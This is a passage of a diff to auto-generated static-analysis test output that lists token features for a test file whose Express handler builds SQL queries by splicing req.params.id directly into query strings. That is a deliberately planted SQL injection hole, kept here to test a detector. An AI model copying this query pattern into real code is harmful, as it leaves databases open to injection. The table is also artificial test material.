| express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:32 | express | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:5:1:32 | express ... press') | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:21 | require | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:32 | exceptional return of require('express') | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:15:1:32 | require('express') | fileImports | express mssql | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:1:23:1:31 | 'express' | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:9 | sql | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:9 | sql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:9 | sql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:9 | sql | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:28 | sql | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:28 | sql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:28 | sql | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:28 | sql = r ... mssql') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:28 | sql = r ... mssql') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:7:2:28 | sql = r ... mssql') | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:19 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:19 | require | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:28 | exceptional return of require('mssql') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:28 | exceptional return of require('mssql') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:28 | exceptional return of require('mssql') | fileImports | express mssql | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:28 | require('mssql') | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:28 | require('mssql') | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:13:2:28 | require('mssql') | fileImports | express mssql | @@ -4385,6 +20956,39 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:21:2:27 | 'mssql' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:21:2:27 | 'mssql' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:2:21:2:27 | 'mssql' | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:7 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:7 | app | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:19 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:19 | app | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:5:4:19 | app = express() | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:17 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:17 | express | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:19 | exceptional return of express() | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:19 | express() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:4:11:4:19 | express() | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:5:3 | app | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:5:3 | app | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:5:7 | app.get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:5:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:5:7 | app.get | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:10:2 | app.get ... '");\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:10:2 | app.get ... '");\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:10:2 | app.get ... '");\\n}) | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:10:2 | exceptional return of app.get ... '");\\n}) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:10:2 | exceptional return of app.get ... '");\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:1:10:2 | exceptional return of app.get ... '");\\n}) | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:5:5:7 | get | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:5:5:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:5:5:7 | get | fileImports | express mssql | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:9:5:19 | '/post/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:9:5:19 | '/post/:id' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:9:5:19 | '/post/:id' | calleeImports | express | @@ -4392,6 +20996,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:9:5:19 | '/post/:id' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:9:5:19 | '/post/:id' | fileImports | express mssql | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:9:5:19 | '/post/:id' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | sql | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | sql | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | sql | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | sql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | sql | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | this | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:5:21 | this | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | 'arguments' object of anonymous function | fileImports | express mssql | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | async f ... "'");\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | async f ... "'");\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | async f ... "'");\\n} | calleeImports | express | @@ -4399,6 +21018,142 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | async f ... "'");\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | async f ... "'");\\n} | fileImports | express mssql | | autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | async f ... "'");\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | exceptional return of anonymous function | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | exceptional return of anonymous function | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | return of anonymous function | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:22:10:1 | return of anonymous function | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:37:5:39 | req | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:42:5:44 | res | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:42:5:44 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:42:5:44 | res | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:42:5:44 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:5:42:5:44 | res | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:5 | sql | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:5 | sql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:5 | sql | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:5 | sql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:5 | sql | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:11 | sql.query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:11 | sql.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:11 | sql.query | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:11 | sql.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:11 | sql.query | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:62 | sql.que ... ms.id}` | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:62 | sql.que ... ms.id}` | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:62 | sql.que ... ms.id}` | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:62 | sql.que ... ms.id}` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:3:7:62 | sql.que ... ms.id}` | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:7:7:11 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:7:7:11 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:7:7:11 | query | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:7:7:11 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:7:7:11 | query | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:12:7:62 | `select ... ms.id}` | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:12:7:62 | `select ... ms.id}` | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:12:7:62 | `select ... ms.id}` | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:12:7:62 | `select ... ms.id}` | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:12:7:62 | `select ... ms.id}` | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:13:7:45 | select ... e id = | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:13:7:45 | select ... e id = | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:13:7:45 | select ... e id = | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:13:7:45 | select ... e id = | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:13:7:45 | select ... e id = | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:50 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:50 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:50 | req | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:50 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:50 | req | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:57 | req.params | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:57 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:57 | req.params | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:57 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:57 | req.params | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:60 | req.params.id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:60 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:60 | req.params.id | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:60 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:48:7:60 | req.params.id | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:52:7:57 | params | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:52:7:57 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:52:7:57 | params | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:52:7:57 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:52:7:57 | params | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:59:7:60 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:59:7:60 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:59:7:60 | id | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:59:7:60 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:7:59:7:60 | id | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | exceptional return of new sql.Request() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | exceptional return of new sql.Request() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | exceptional return of new sql.Request() | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | exceptional return of new sql.Request() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | exceptional return of new sql.Request() | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | new sql.Request() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | new sql.Request() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | new sql.Request() | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | new sql.Request() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:19 | new sql.Request() | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:25 | new sql ... ).query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:25 | new sql ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:25 | new sql ... ).query | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:25 | new sql ... ).query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:25 | new sql ... ).query | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | exceptional return of new sql ... + "'") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | exceptional return of new sql ... + "'") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | exceptional return of new sql ... + "'") | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | exceptional return of new sql ... + "'") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | exceptional return of new sql ... + "'") | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | new sql ... + "'") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | new sql ... + "'") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | new sql ... + "'") | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | new sql ... + "'") | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:3:9:85 | new sql ... + "'") | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:9 | sql | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:9 | sql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:9 | sql | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:9 | sql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:9 | sql | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:17 | sql.Request | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:17 | sql.Request | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:17 | sql.Request | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:17 | sql.Request | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:7:9:17 | sql.Request | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:11:9:17 | Request | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:11:9:17 | Request | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:11:9:17 | Request | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:11:9:17 | Request | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:11:9:17 | Request | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:21:9:25 | query | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:21:9:25 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:21:9:25 | query | enclosingFunctionBody | req res sql query select * from mytable where id = req params id sql Request query select * from mytable where id = ' req params id ' | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:21:9:25 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:21:9:25 | query | fileImports | express mssql | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:62 | "select ... id = '" | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:62 | "select ... id = '" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/tst2.js:9:27:9:62 | "select ... id = '" | enclosingFunctionBody | req res sql query select * from mytable 